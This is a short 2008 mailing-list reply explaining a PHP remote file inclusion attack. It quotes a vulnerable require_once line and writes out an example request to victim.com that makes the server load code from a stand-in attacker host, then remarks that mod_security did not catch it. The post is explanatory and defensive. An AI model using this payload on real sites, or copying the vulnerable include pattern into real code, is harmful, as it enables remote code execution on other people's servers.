12 Aug
2008
12 Aug
'08
6:28 p.m.
On Tuesday 12 August 2008 12:18, Rainer Duffner wrote:
(I think it requires both register_globals and allow_url_fopen to be on, but I'm not sure if you can't get it to work with only allow_url_fopen....)
as I just found out, it can, as long as the PHP developer was even more naive than usual. The offending line was:
require_once($_SERVER['DOCUMENT_ROOT']."/db.inc.php");
then a request like:
http://victim.com/index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://badguysit e.es/bot.txt
will do a fopen() for "http://badguysite.es/bot.txt/db.inc.php", which is good enough.
And yeah this works with register_globals off, which surprised me. And also surprised that mod_security has no problem with that URL. I am going to raise the issue with them.
cheers Sam